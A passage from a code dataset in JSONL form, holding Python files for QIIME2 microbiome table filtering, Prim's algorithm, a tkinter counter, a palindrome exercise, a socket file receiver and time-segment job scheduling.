False and key[v] > self.graph[u][v]:\r\n key[v] = self.graph[u][v]\r\n parent[v] = u\r\n\r\n self.printMST(parent)\r\n","sub_path":"prim_algorithm.py","file_name":"prim_algorithm.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509736123","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2020, Franck Lejzerowicz.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport sys\nimport yaml\nimport itertools\nimport numpy as np\nimport pandas as pd\nfrom os.path import isfile, splitext\n\nimport plotly\nimport plotly.graph_objs as go\n\nfrom routine_qiime2_analyses._routine_q2_xpbs import run_xpbs, print_message\nfrom routine_qiime2_analyses._routine_q2_io_utils import (\n read_yaml_file, get_job_folder, get_fps, get_raref_tab_meta_pds,\n get_raref_table, simple_chunks, get_analysis_folder, filter_mb_table,\n filter_non_mb_table)\nfrom routine_qiime2_analyses._routine_q2_cmds import run_import\nfrom routine_qiime2_analyses._routine_q2_mmvec import get_mmvec_dicts\nfrom routine_qiime2_analyses._routine_q2_songbird import get_songbird_dicts\n\n\ndef import_datasets(\n i_datasets_folder: str, datasets: dict, datasets_phylo: dict,\n force: bool, prjct_nm: str, qiime_env: str, chmod: str,\n noloc: bool, run_params: dict, filt_raref: str, jobs: bool,\n slurm: bool, chunkit: int) -> None:\n \"\"\"Initial imports of the .tsv datasets in to Qiime2 Artefacts\n\n Parameters\n ----------\n i_datasets_folder : str\n Names identifying the datasets in the input folder\n datasets : dict\n Mapping dataset name -> [data file path, metadata file path]\n datasets_phylo : dict\n Mapping dataset name -> ('tree_to_use', 'corrected_or_not')\n force : bool\n Force the re-writing of scripts for all commands\n prjct_nm : str\n Nick name for the project.\n qiime_env : str\n Name of a qiime2 conda environment where analysis\n tools to be run are installed\n chmod : str\n noloc : bool\n run_params : dict\n filt_raref : str\n jobs : bool\n chunkit : int\n\n Returns\n -------\n\n \"\"\"\n job_folder = get_job_folder(i_datasets_folder, 'import_tables')\n job_folder2 = get_job_folder(i_datasets_folder, 'import_tables/chunks')\n\n to_chunk = []\n main_written = 0\n run_pbs = '%s/0_run_import_%s%s.sh' % (job_folder, prjct_nm, filt_raref)\n with open(run_pbs, 'w') as o:\n for dat, tsv_meta_pds_ in datasets.items():\n written = 0\n out_sh = '%s/0_run_import_%s_%s%s.sh' % (\n job_folder2, prjct_nm, dat, filt_raref)\n if slurm:\n out_pbs = '%s.slm' % splitext(out_sh)[0]\n else:\n out_pbs = '%s.pbs' % splitext(out_sh)[0]\n with open(out_sh, 'w') as cur_sh:\n for tsv_meta_pds in tsv_meta_pds_: # REMOVE IF FIXED NOT KEPT\n tsv, meta = tsv_meta_pds\n qza = '%s.qza' % splitext(tsv)[0]\n if datasets_phylo[dat][1]:\n cmd = run_import(tsv, qza, 'FeatureTable[Frequency]')\n cur_sh.write('echo \"%s\"\\n' % cmd)\n cur_sh.write('%s\\n' % cmd)\n written += 1\n elif force or not isfile(qza):\n cmd = run_import(tsv, qza, 'FeatureTable[Frequency]')\n cur_sh.write('echo \"%s\"\\n' % cmd)\n cur_sh.write('%s\\n' % cmd)\n written += 1\n if written:\n main_written += 1\n to_chunk.append(out_sh)\n if not chunkit:\n job_name = '%s.mprt.%s%s' % (prjct_nm, dat, filt_raref)\n run_xpbs(\n out_sh, out_pbs, job_name, qiime_env,\n run_params[\"time\"], run_params[\"n_nodes\"],\n run_params[\"n_procs\"], run_params[\"mem_num\"],\n run_params[\"mem_dim\"], chmod, written, 'single',\n o, noloc, slurm, jobs\n )\n if to_chunk and chunkit:\n simple_chunks(\n run_pbs, job_folder2, to_chunk, 'imports', prjct_nm,\n run_params[\"time\"], run_params[\"n_nodes\"], run_params[\"n_procs\"],\n run_params[\"mem_num\"], run_params[\"mem_dim\"], qiime_env, chmod,\n noloc, slurm, jobs, chunkit, None\n )\n\n if main_written:\n print_message('# Import tables to qiime2', 'sh', run_pbs, jobs)\n\n\n# def get_threshs(p_filt_threshs):\n# if not isfile(p_filt_threshs):\n# print('yaml file for filtering thresholds does not exist:\\n%s\\nExiting...' % p_filt_threshs)\n# sys.exit(0)\n# with open(p_filt_threshs) as handle:\n# try:\n# threshs_d = yaml.load(handle, Loader=yaml.FullLoader)\n# except AttributeError:\n# threshs_d = yaml.load(handle)\n# return threshs_d\n\n\ndef deleted_non_filt(datasets: dict, datasets_read: dict, datasets_features: dict,\n datasets_phylo: dict, datasets_rarefs: dict, taxonomies: dict,\n datasets_filt: dict, datasets_filt_map: dict):\n for d in [datasets, datasets_read, datasets_features,\n datasets_phylo, datasets_rarefs, taxonomies]:\n to_delete = []\n for dat in d:\n if dat not in datasets_filt_map and dat in datasets_filt:\n to_delete.append(dat)\n for delete in to_delete:\n d.pop(delete)\n break\n\n\ndef get_thresholds(threshs_d: dict) -> tuple:\n \"\"\"\n\n Parameters\n ----------\n threshs_d : dict\n Thresholds configs\n\n Returns\n -------\n names : list\n Name for the threshold\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n \"\"\"\n names = []\n if 'names' in threshs_d:\n names = threshs_d['names']\n thresh_sam = 0\n if 'samples' in threshs_d:\n thresh_sam = threshs_d['samples']\n thresh_feat = 0\n if 'features' in threshs_d:\n thresh_feat = threshs_d['features']\n return names, thresh_sam, thresh_feat\n\n\ndef no_filtering(\n dat: str,\n thresh_sam: int,\n thresh_feat: int) -> bool:\n \"\"\"Checks whether to skip filtering or not.\n\n Parameters\n ----------\n dat : str\n Dataset name\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n\n Returns\n -------\n skip : bool\n Whether to skip filtering or not\n \"\"\"\n skip = False\n if not thresh_sam and not thresh_feat:\n print('Filtering threshold(s) of 0 do nothing: skipping...')\n skip = True\n thresh_sam_is_numeric = isinstance(thresh_sam, (float, int))\n thresh_feat_is_numeric = isinstance(thresh_feat, (float, int))\n if not thresh_sam_is_numeric or not thresh_feat_is_numeric:\n print('Filtering threshold for %s not a '\n 'integer/float: skipping...' % dat)\n skip = True\n if thresh_sam < 0 or thresh_feat < 0:\n print('Filtering threshold must be positive: skipping...')\n skip = True\n return skip\n\n\ndef get_dat_filt(\n dat: str,\n names: list,\n thresh_sam: int,\n thresh_feat: int) -> str:\n \"\"\"Get a build-up new name for\n the filtered version of a dataset.\n\n Parameters\n ----------\n dat : str\n Dataset name\n names : list\n Name for the threshold\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n\n Returns\n -------\n dat_filt : str\n New dataset name for the filtered version\n \"\"\"\n dat_filt = []\n if names:\n dat_filt.append('%srm' % len(names))\n if thresh_sam:\n if thresh_sam > 1:\n dat_filt.append('minSam%s' % thresh_sam)\n else:\n dat_filt.append('minSam%s' % str(thresh_sam).replace('.', ''))\n\n if thresh_feat:\n if thresh_feat > 1:\n dat_filt.append('minFeat%s' % thresh_feat)\n else:\n dat_filt.append('minFeat%s' % str(thresh_feat).replace('.', ''))\n dat_filt = '%s_%s' % (dat, '-'.join(dat_filt))\n return dat_filt\n\n\ndef get_applied_thresholds_text(threshs_d: dict) -> tuple:\n \"\"\"\n\n Parameters\n ----------\n threshs_d : dict\n Thresholds configs\n\n Returns\n -------\n names : list\n Name for the threshold\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n \"\"\"\n names = []\n if 'names' in threshs_d:\n names = threshs_d['names']\n thresh_sam = 0\n if 'samples' in threshs_d:\n thresh_sam = threshs_d['samples']\n thresh_feat = 0\n if 'features' in threshs_d:\n thresh_feat = threshs_d['features']\n return names, thresh_sam, thresh_feat\n\n\ndef filtering_names(\n names: list,\n tab_filt_pd: pd.DataFrame):\n \"\"\"\n Parameters\n ----------\n names : list\n Name for the threshold\n tab_filt_pd : pd.DataFrame\n Input raw feature table\n \"\"\"\n if names:\n names_in = list(set(tab_filt_pd.columns) & set(names))\n tab_filt_pd.drop(columns=names_in, inplace=True)\n\n\ndef filtering_samples(\n thresh_sam: int,\n tab_filt_pd: pd.DataFrame):\n \"\"\"\n\n Parameters\n ----------\n thresh_sam : int\n Samples threshold\n tab_filt_pd : pd.DataFrame\n Input feature table\n \"\"\"\n if thresh_sam:\n samples = tab_filt_pd.columns\n if thresh_sam > 1:\n to_drop = samples[tab_filt_pd.sum(0) < thresh_sam]\n else:\n tab_perc_min = tab_filt_pd.sum(0).mean() * thresh_sam\n to_drop = samples[tab_filt_pd.sum(0) < tab_perc_min]\n if to_drop.size:\n tab_filt_pd.drop(columns=to_drop, inplace=True)\n\n\ndef filtering_features(\n thresh_feat: int,\n tab_filt_pd: pd.DataFrame):\n \"\"\"\n\n Parameters\n ----------\n thresh_feat : int\n Features threshold\n tab_filt_pd : pd.DataFrame\n Input feature table\n \"\"\"\n if thresh_feat:\n if thresh_feat > 1:\n tab_filt_rm = tab_filt_pd < thresh_feat\n else:\n tab_perc = tab_filt_pd / tab_filt_pd.sum(0)\n tab_filt_rm = tab_perc < thresh_feat\n tab_filt_pd[tab_filt_rm] = 0\n\n\ndef filtering_thresholds(\n names: list,\n thresh_sam: int,\n thresh_feat: int,\n tab_pd: pd.DataFrame) -> tuple:\n \"\"\"\n\n Parameters\n ----------\n names : list\n Name for the threshold\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n tab_pd : pd.DataFrame\n Input raw feature table\n\n Returns\n -------\n tab_filt_pd : pd.DataFrame\n Output filtered feature table\n \"\"\"\n tab_filt_pd = tab_pd.copy()\n filtering_names(names, tab_filt_pd)\n filtering_samples(thresh_sam, tab_filt_pd)\n filtering_features(thresh_feat, tab_filt_pd)\n\n tab_filt_pd = tab_filt_pd.loc[tab_filt_pd.sum(1) > 0, :]\n tab_filt_pd = tab_filt_pd.loc[:, tab_filt_pd.sum(0) > 0]\n return tab_filt_pd\n\n\ndef harsh_filtering(\n dat_filt: str,\n tab_filt_pd: pd.DataFrame) -> bool:\n \"\"\"\n\n Parameters\n ----------\n dat_filt : str\n New dataset name for the filtered version\n tab_filt_pd : pd.DataFrame\n Filtered feature table\n\n Returns\n -------\n skip : bool\n Whether to skip a too harsh filtering\n \"\"\"\n skip = False\n if tab_filt_pd.shape[0] < 10 or tab_filt_pd.shape[1] < 2:\n print('Filtering too harsh (no more data for %s): '\n 'skipping...' % dat_filt)\n skip = True\n return skip\n\n\ndef filter_rare_samples(\n i_datasets_folder: str, datasets: dict, datasets_read: dict,\n datasets_features: dict, datasets_rarefs: dict, datasets_filt: dict,\n datasets_filt_map: dict, datasets_phylo: dict, prjct_nm: str,\n qiime_env: str, p_filt_threshs: str, chmod: str, noloc: bool,\n run_params: dict, filt_raref: str, jobs: bool, slurm: bool,\n chunkit: int) -> None:\n \"\"\"\n Filter the rare features, keep samples with enough reads/features and import to Qiime2.\n\n :param i_datasets_folder: Path to the folder containing the data/metadata subfolders.\n :param datasets: dataset -> [tsv/biom path, meta path]\n :param datasets_read: dataset -> [tsv table, meta table]\n :param datasets_features: dataset -> list of features names in the dataset tsv / biom file.\n :param datasets_phylo: to be updated with ('tree_to_use', 'corrected_or_not') per dataset.\n :param prjct_nm: Short nick name for your project.\n :param qiime_env: name of your qiime2 conda environment (e.g. qiime2-2019.10).\n :param thresh: min number of reads per sample to keep it.\n :param chmod: whether to change permission of output files (defalt: 775).\n \"\"\"\n threshs_dats = read_yaml_file(p_filt_threshs)\n\n written = 0\n datasets_update = {}\n datasets_read_update = {}\n datasets_features_update = {}\n datasets_phylo_update = {}\n job_folder = get_job_folder(i_datasets_folder, 'import_filtered')\n out_sh = '%s/1_run_import_filtered_%s%s.sh' % (job_folder, prjct_nm, filt_raref)\n if slurm:\n out_pbs = '%s.slm' % splitext(out_sh)[0]\n else:\n out_pbs = '%s.pbs' % splitext(out_sh)[0]\n to_chunk = []\n with open(out_sh, 'w') as sh:\n for dat, tab_meta_pds_ in datasets_read.items():\n if dat not in threshs_dats:\n continue\n names, thresh_sam, thresh_feat = get_thresholds(threshs_dats[dat])\n if no_filtering(dat, thresh_sam, thresh_feat):\n continue\n dat_filt = get_dat_filt(dat, names, thresh_sam, thresh_feat)\n\n datasets_filt[dat] = dat_filt\n datasets_filt_map[dat_filt] = dat\n datasets_rarefs[dat_filt] = ['']\n\n tsv_filt, qza_filt, meta_filt = get_fps(\n i_datasets_folder, dat_filt)\n\n if isfile(qza_filt) and isfile(meta_filt):\n datasets_update[dat_filt] = [[tsv_filt, meta_filt]]\n tab_filt_pd = pd.read_csv(\n tsv_filt, index_col=0, header=0, sep='\\t')\n with open(meta_filt) as f:\n for line in f:\n break\n meta_filt_pd = pd.read_csv(\n meta_filt, header=0, sep='\\t',\n dtype={line.split('\\t')[0]: str},\n low_memory=False)\n # datasets_read_update[dat_filt] = [tab_filt_pd, meta_filt_pd]\n datasets_read_update[dat_filt] = [[tab_filt_pd, meta_filt_pd]]\n datasets_phylo_update[dat_filt] = datasets_phylo[dat]\n datasets_features_update[dat_filt] = dict(\n gid_feat for gid_feat in datasets_features[dat].items()\n if gid_feat[1] in tab_filt_pd.index\n )\n continue\n\n for (tab_pd, meta_pd) in tab_meta_pds_:\n tab_filt_pd = filtering_thresholds(\n names, thresh_sam, thresh_feat, tab_pd)\n if harsh_filtering(dat_filt, tab_filt_pd):\n continue\n meta_filt_pd = meta_pd.loc[meta_pd.sample_name.isin(\n tab_filt_pd.columns.tolist())].copy()\n tab_filt_pd.reset_index().to_csv(tsv_filt, index=False, sep='\\t')\n meta_filt_pd.to_csv(meta_filt, index=False, sep='\\t')\n\n datasets_update[dat_filt] = [[tsv_filt, meta_filt]]\n datasets_read_update[dat_filt] = [[tab_filt_pd, meta_filt_pd]]\n datasets_phylo_update[dat_filt] = datasets_phylo[dat]\n datasets_features_update[dat_filt] = dict(\n gid_feat for gid_feat in datasets_features[dat].items()\n if gid_feat[1] in tab_filt_pd.index\n )\n cmd = run_import(tsv_filt, qza_filt, \"FeatureTable[Frequency]\")\n sh.write('echo \"%s\"\\n' % cmd)\n sh.write('%s\\n' % cmd)\n written += 1\n if written:\n run_xpbs(out_sh, out_pbs, '%s.fltr%s' % (prjct_nm, filt_raref), qiime_env,\n run_params[\"time\"], run_params[\"n_nodes\"], run_params[\"n_procs\"],\n run_params[\"mem_num\"], run_params[\"mem_dim\"], chmod, written,\n '# Filter samples for a min number of %s reads' % p_filt_threshs,\n None, noloc, slurm, jobs)\n\n # after this update, the raw dataset remain included\n datasets.update(datasets_update)\n datasets_read.update(datasets_read_update)\n datasets_features.update(datasets_features_update)\n datasets_phylo.update(datasets_phylo_update)\n\n\ndef get_filt3d_params(p_config, analysis):\n if analysis == 'mmvec':\n mmvec_dicts = get_mmvec_dicts(p_config)\n filtering = mmvec_dicts[1]\n else:\n songbird_dicts = get_songbird_dicts(p_config)\n filtering = songbird_dicts[1]\n return filtering\n\n\ndef explore_filtering(i_datasets_folder, datasets, datasets_read,\n datasets_filt, datasets_filt_map,\n filtering, p_filt3d_config):\n\n if p_filt3d_config and isfile(p_filt3d_config):\n with open(p_filt3d_config) as handle:\n try:\n explor = yaml.load(handle, Loader=yaml.FullLoader)\n except AttributeError:\n explor = yaml.load(handle)\n\n defaults = (\n {'prevalCount': set(explor['prevalCount']),\n 'prevalPercent': set(explor['prevalPercent'])},\n {'abundCount': set(explor['abundCount']),\n 'abundPercent': set(explor['abundPercent'])})\n else:\n defaults = (\n {'prevalCount': {0, 1, 2, 3, 5, 10, 20, 30},\n 'prevalPercent': {0, 0.01, 0.02, 0.05, 0.1}},\n {'abundCount': {0, 1, 2, 5, 10, 100, 1000},\n 'abundPercent': {0, .001, .01, .02, .03, .05, .1}})\n\n scales = {}\n currents = {}\n for pair, filt_d in filtering.items():\n for filt, dat_preval_abund in filt_d.items():\n for (dat, mb), preval_abund in dat_preval_abund.items():\n\n preval, abund = map(float, preval_abund)\n\n if preval == 0 and abund == 0:\n continue\n if preval < 1:\n preval_label = 'prevalPercent'\n else:\n preval_label = 'prevalCount'\n\n if abund < 1:\n abund_label = 'abundPercent'\n else:\n abund_label = 'abundCount'\n\n if (preval_label, abund_label) not in scales:\n scales[(preval_label, abund_label)] = {}\n if (dat, mb) not in scales[(preval_label, abund_label)]:\n currents.setdefault((dat, mb), []).append((preval, abund))\n scales[(preval_label, abund_label)][(dat, mb)] = (\n defaults[0][preval_label], defaults[1][abund_label])\n scales[(preval_label, abund_label)][(dat, mb)][0].add(preval)\n scales[(preval_label, abund_label)][(dat, mb)][1].add(abund)\n\n for (preval_label, abund_label), dats_d in scales.items():\n out_dir = get_analysis_folder(\n i_datasets_folder, 'filter3D/scale_%s_%s' % (preval_label, abund_label))\n for (dat_, mb), prevals_abunds in dats_d.items():\n if dat_ in datasets_filt:\n dat = datasets_filt[dat_]\n else:\n dat = dat_\n if dat not in datasets:\n if '__raref' in dat:\n split = dat.split('__raref')\n dat = '__raref'.join(split[:-1])\n raref = '_raref%s' % '__raref'.join(split[-1:])\n if dat in datasets_filt:\n dat = datasets_filt[dat]\n tsv_pd_, meta_pd_, meta = get_raref_table(dat, raref, i_datasets_folder, 'filter3D')\n if not tsv_pd_.shape[0]:\n continue\n dat = '%s_%s' % (dat, raref)\n else:\n print('dataset \"%s\" not found...' % dat)\n continue\n elif not isinstance(datasets_read[dat][0], pd.DataFrame) and datasets_read[dat][0] == 'raref':\n tsv, meta = datasets[dat]\n if not isfile(tsv):\n print('Must have run rarefaction to use it further...\\nExiting')\n sys.exit(0)\n tsv_pd_, meta_pd_ = get_raref_tab_meta_pds(meta, tsv)\n datasets_read[dat] = [[tsv_pd_, meta_pd_]]\n else:\n tsv_pd_, meta_pd_ = datasets_read[dat][0]\n\n res = []\n rdx = 0\n prevals, abunds = prevals_abunds\n for (preval, abund) in itertools.product(*[sorted(prevals), sorted(abunds)]):\n rdx += 1\n tsv_pd = tsv_pd_.loc[tsv_pd_.sum(1) > 0, :].copy()\n tsv_pd = tsv_pd.loc[:, tsv_pd.sum(0) > 0]\n if mb:\n tsv_pd, cur_res = filter_mb_table(preval, abund, tsv_pd, True)\n else:\n tsv_pd, cur_res = filter_non_mb_table(preval, abund, tsv_pd, True)\n if (preval, abund) in currents[(dat, mb)]:\n cur_res.append(1)\n else:\n cur_res.append(0)\n res.append(cur_res)\n res_pd = pd.DataFrame(res, columns=['preval_filt', 'abund_filt', 'features',\n 'samples', 'data'])\n res_pd['features'] = np.log10(res_pd['features']+1)\n x = res_pd.preval_filt.unique()\n y = res_pd.abund_filt.unique()\n X, Y = np.meshgrid(x, y)\n Z = res_pd.features.values.reshape(X.shape, order='f')\n\n layout = go.Layout(\n scene=dict(\n xaxis=dict(title=abund_label),\n yaxis=dict(title=preval_label),\n zaxis=dict(title='log10(features)')),\n autosize=True,\n width=700, height=700,\n title=\"Filtering process\",\n margin=dict(l=65, r=50, b=65, t=90))\n fig = go.Figure(\n data=[\n go.Surface(\n x=Y, y=X, z=Z,\n colorscale='Viridis',\n reversescale=True)\n ],\n layout=layout\n )\n fig.update_traces(contours_z=dict(show=True, usecolormap=True,\n highlightcolor=\"limegreen\", project_z=True))\n fig.add_scatter3d(\n y=X.flatten(), x=Y.flatten(), z=Z.flatten(),\n mode='markers', marker=dict(size=4, color='black'))\n res_data_pd = res_pd.loc[(res_pd.data == 1)].copy()\n x = res_data_pd.preval_filt.unique()\n y = res_data_pd.abund_filt.unique()\n X, Y = np.meshgrid(x, y)\n Z = res_data_pd.features.values.reshape(X.shape, order='f')\n fig.add_scatter3d(\n y=X.flatten(), x=Y.flatten(), z=Z.flatten(),\n mode='markers', marker=dict(size=6, color='red'))\n html_fo = '%s/%s_%s.html' % (out_dir, dat, mb)\n print(' -> Written:', html_fo)\n plotly.offline.plot(fig, filename=html_fo, auto_open=False)\n","sub_path":"routine_qiime2_analyses/_routine_q2_filter.py","file_name":"_routine_q2_filter.py","file_ext":"py","file_size_in_byte":23434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132522090","text":"import tkinter as tk\n\n# counter = 0 \n# def counter_label(label):\n# def count():\n# global counter\n# counter += 1\n# label.config(text=str(counter))\n# label.after(1000, count)\n# count()\n\n\ndef data_label(label,name,value):\n def count():\n# global counter\n# counter += 1\n dis = name + ' ' + str(value)\n label.config(text=dis)\n label.after(1000, count)\n count()\n \nroot = tk.Tk()\nroot.title(\"Counting Seconds\")\nlabel = tk.Label(root, fg=\"green\")\n\n# label.place(relx = 0.3, \n# rely = 0.1, \n# anchor = 'center')\n\nlabel.pack()\ndata_label(label,'Temp',20)#\n\nlabel2 = tk.Label(root, fg=\"green\")\nlabel2.pack()\ndata_label(label2,'HUM',70)\n\nbutton = tk.Button(root, text='Stop', width=25, command=root.destroy)\nbutton.pack()\nroot.mainloop()\n\n\n","sub_path":".ipynb_checkpoints/tes-checkpoint.py","file_name":"tes-checkpoint.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"592775894","text":"frase = str(input(\"Digite uma frase qualquer: \")).strip().upper()\npalavras = frase.split()\njunto = ''.join(palavras)\ninverso = ''\nfor letra in range(len(junto)-1,-1,-1):\n inverso += junto[letra]\nprint(junto,inverso)\nif junto == inverso:\n print(\"É palíndromo\")\nelse:\n print(\"Não é palindromo\")\n","sub_path":"Gustavo Guanabara/#53 - Palindromo.py","file_name":"#53 - Palindromo.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"243492060","text":"import socket\n\nserver = socket.socket()\n\nhost = socket.gethostname() # getting hostname\nip = socket.gethostbyname(host) # getting ip\nport = 9000\n\nbuffer_size = 250000000 # 250mb\n\nserver.bind((host, port))\nserver.listen()\n\nprint(\"Listening at Server IP : {} & Port : {}\".format(ip, str(port)))\n\nclient, address = server.accept()\n\nprint(\"{} is connected\".format(address))\n\nfd = open(\"received-file\", \"wb\")\nbytes_read = client.recv(buffer_size) # receiving file\nfd.write(bytes_read)\n\nclient.close()\nserver.close()","sub_path":"file-transfer/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183878735","text":"# Written Ryan Quitzow-James\n\nfrom __future__ import division\nfrom math import ceil\n\n#opens a file, outputs a 2-d array (1st dimension - line, 2nd dimension - word)\ndef readFile(file_name, delimeter = None):\n with open(file_name, \"r\") as infile:\n content = [x.split(delimeter) for x in infile]\n return content\n\ndef loadLines(filename):\n with open(filename, \"r\") as infile:\n data = [[y.strip(\"_\") for y in x.split()] for x in infile]\n return data\n\ndef saveText(file_name, output_text):\n with open(file_name, \"w\") as outfile:\n outfile.write(output_text)\n\n#takes diretory+filename, outputs full path (takes care of \"/\"s)\ndef glueFileLocation(directory, filename):\n output = None\n if directory[-1] == \"/\":\n if filename[0] == \"/\":\n output = directory + filename[1:]\n else:\n output = directory + filename\n else:\n if filename[0] == \"/\":\n output = directory + filename\n else:\n output = directory + \"/\" + filename\n return output\n\ndef lineCut1Hz(line_info, delta_F):\n band = line_info[0].split(\"-\")\n if len(band) > 0:\n #band_low = band[0]#min(line_center_int(band[0]))\n #band_high = band[1]#max(line_center_int(band[-1]))\n band_low = int(ceil(float(band[0])))\n band_high = int(float(band[-1]))\n notch_lines = [x for x in range(band_low, band_high + 1)]\n else:\n notch_lines = None\n return notch_lines\n\ndef findOverlappingTimes(timeList1, timeList2):\n index_2 = 0\n dual_segments = []\n for seg_1 in timeList1:\n start_1 = int(seg_1[0])\n end_1 = int(seg_1[1])\n if index_2 < len(timeList2):\n while int(timeList2[index_2][1]) <= start_1:\n index_2 += 1\n break_loop = False\n if index_2 >= len(timeList2):\n break_loop = True\n while not break_loop:\n start_2 = int(timeList2[index_2][0])\n end_2 = int(timeList2[index_2][1])\n if start_2 >= end_1:\n break_loop = True\n else:\n if start_1 > start_2:\n seg_start = start_1\n else:\n seg_start = start_2\n if end_1 > end_2:\n index_2 += 1\n seg_end = end_2\n else:\n break_loop = True\n seg_end = end_1\n dual_segments += [[seg_start, seg_end]]\n \"\"\"seg_start = max(start_1, start_2)\n seg_end = min(end_1, end_2)\n dual_segments += [[seg_start, seg_end]]\n if end_1 > end_2:\n index_2 += 1\n else:\n break_loop = True\"\"\"\n if index_2 >= len(timeList2):\n break_loop = True\n return dual_segments\n\ndef calculateSegmentBuffer(NSPI, pixel_duration, buffer_seconds):\n buffer_time = (NSPI - 1) * pixel_duration / 2 + buffer_seconds\n return buffer_time\n\ndef getShortSegTimes(segment, long_buffer, short_buffer, long_pre_trigger, short_pre_trigger, short_preproc_job_duration):\n job_start = segment[0]\n trigger_time = job_start + long_buffer + long_pre_trigger\n job_short_start = trigger_time - short_pre_trigger - short_buffer\n job_short_end = job_short_start + short_preproc_job_duration\n return [job_short_start, job_short_end]\n\n#def calculateWindows(time_list, job_buffer):\n# return None\n\nclass backgroundJobSet(object):\n def __init__(self, NSPI = 9, long_pixel_duration = 4, short_pixel_duration = 1, job_buffer = 1, time_shift = 1, buffer_seconds = 2, short_job_post_trigger = 400, short_job_pre_trigger = 10, possible_interval_list = None, post_veto_times = None, bad_times = None, essential_jobs = None, essential_short_jobs = None, long_job_duration_override = None, short_job_duration_override = None):\n self.NSPI = NSPI\n self.longPixelDuration = long_pixel_duration\n self.shortPixelDuration = short_pixel_duration\n self.jobBuffer = job_buffer\n self.timeShift = time_shift\n self.bufferSeconds = buffer_seconds\n self.calculateSegmentBuffers()\n self.shortJobPreTrigger = short_job_pre_trigger\n self.shortJobPostTrigger = short_job_post_trigger\n self.possibleIntervalList = possible_interval_list\n self.essential_jobs = essential_jobs\n self.essential_short_jobs = essential_short_jobs\n self.long_job_duration_override = long_job_duration_override\n self.short_job_duration_override = short_job_duration_override\n if self.possibleIntervalList:\n self.calculateJobs()\n if post_veto_times:\n self.findPostVetoJobs(post_veto_times, bad_times)\n\n def calculateSegmentBuffers(self):\n self.longSegmentBuffer = calculateSegmentBuffer(self.NSPI, self.longPixelDuration, self.bufferSeconds)\n self.shortSegmentBuffer = calculateSegmentBuffer(self.NSPI, self.shortPixelDuration, self.bufferSeconds)\n\n def getShortSegTime(self, segment):\n job_start = segment[0]\n trigger_time = job_start + self.longSegmentBuffer + self.longJobPreTrigger\n job_short_start = trigger_time - self.shortJobPreTrigger - self.shortSegmentBuffer\n job_short_end = job_short_start + self.shortPreprocJobDuration\n return [job_short_start, job_short_end]\n\n def calculateJobs(self):\n #print(self.possibleIntervalList)\n print(\"Preparing job list from possibleIntervalList\")\n self.longJobPostTrigger = self.shortJobPostTrigger * self.longPixelDuration / self.shortPixelDuration\n self.longJobPreTrigger = self.shortJobPreTrigger * self.longPixelDuration / self.shortPixelDuration\n self.longJobDuration = self.longJobPreTrigger + self.longJobPostTrigger\n if self.long_job_duration_override:\n self.longPreprocJobDuration = self.long_job_duration_override\n else:\n self.longPreprocJobDuration = self.longJobDuration + 2*self.longSegmentBuffer + int(ceil(self.longPixelDuration/2))\n self.longJobStartSeparation = self.longPreprocJobDuration + self.jobBuffer\n\n self.shortJobDuration = self.shortJobPreTrigger + self.shortJobPostTrigger\n if self.short_job_duration_override:\n self.shortPreprocJobDuration = self.short_job_duration_override\n else:\n self.shortPreprocJobDuration = self.shortJobDuration + 2*self.shortSegmentBuffer + int(ceil(self.shortPixelDuration/2))\n\n # create list of long duration jobs\n job_start_dif = self.longJobStartSeparation\n effective_job_length = self.longPreprocJobDuration\n #temp_job_list = [[[x[0] + y*(job_start_dif), x[0] + y*(job_start_dif) + effective_job_length]\n # for y in range(int((x[1] - x[0])//(job_start_dif)))] for x in self.possibleIntervalList]\n temp_job_list = [create_jobs_from_interval(x, job_start_dif, effective_job_length) for x in self.possibleIntervalList]\n if not temp_job_list[0]:\n print(\"Temporary version of interval checker that checks first interval only. This function should be updated to include the last possible interval even if there is no buffer after it since it would be the last one. This probably entails making the first section per interval separately, then the rest based on haveing the buffer between jobs in front.\")\n if self.possibleIntervalList[0][1] - self.possibleIntervalList[0][0] >= effective_job_length:\n temp_job_list = [[[self.possibleIntervalList[0][0],self.possibleIntervalList[0][0] + effective_job_length]]]\n #print(temp_job_list)\n #print(job_start_dif)\n #print(int((x[1] - x[0])//(job_start_dif)))\n # flatten job list into just a list of lists, instead of a list of lists of lists\n print(\"Finding long jobs\")\n self.longJobs = [y for x in temp_job_list for y in x]\n if self.essential_jobs:\n self.longJobs += self.essential_jobs\n self.longJobList = self.longJobs[:]\n print(\"Finding short jobs\")\n self.shortJobs = [self.getShortSegTime(x) for x in self.longJobs]\n if self.essential_short_jobs:\n self.shortJobs += essential_short_jobs\n print(\"Creating full list of jobs\")\n temp_full_list = [[self.longJobs[num], self.shortJobs[num]] for num in range(len(self.longJobs))]\n print(\"flattening list of jobs\")\n flat_temp_full_list = [y for x in temp_full_list for y in x]\n print(\"Creating job list\")\n self.jobList = [[num + 1] + flat_temp_full_list[num] + [flat_temp_full_list[num][1] - flat_temp_full_list[num][0]] for num in range(len(flat_temp_full_list))]\n print(\"Creating preprocJobList\")\n self.preprocJobList = [[num + 1] + flat_temp_full_list[num] + [flat_temp_full_list[num][1] - flat_temp_full_list[num][0]] for num in range(len(flat_temp_full_list))]\n print(\"Creating burstegardPreprocJobList\")\n self.burstegardPreprocJobList = [[num + 1] + self.longJobs[num] + [self.longJobs[num][1] - self.longJobs[num][0]] for num in range(len(self.longJobs))]\n #print(self.shortJobs)\n print(\"Creating jobMap\")\n self.jobMap = dict((job+1, job+1) for job in range(len(self.preprocJobList)))\n self.longJobMap = 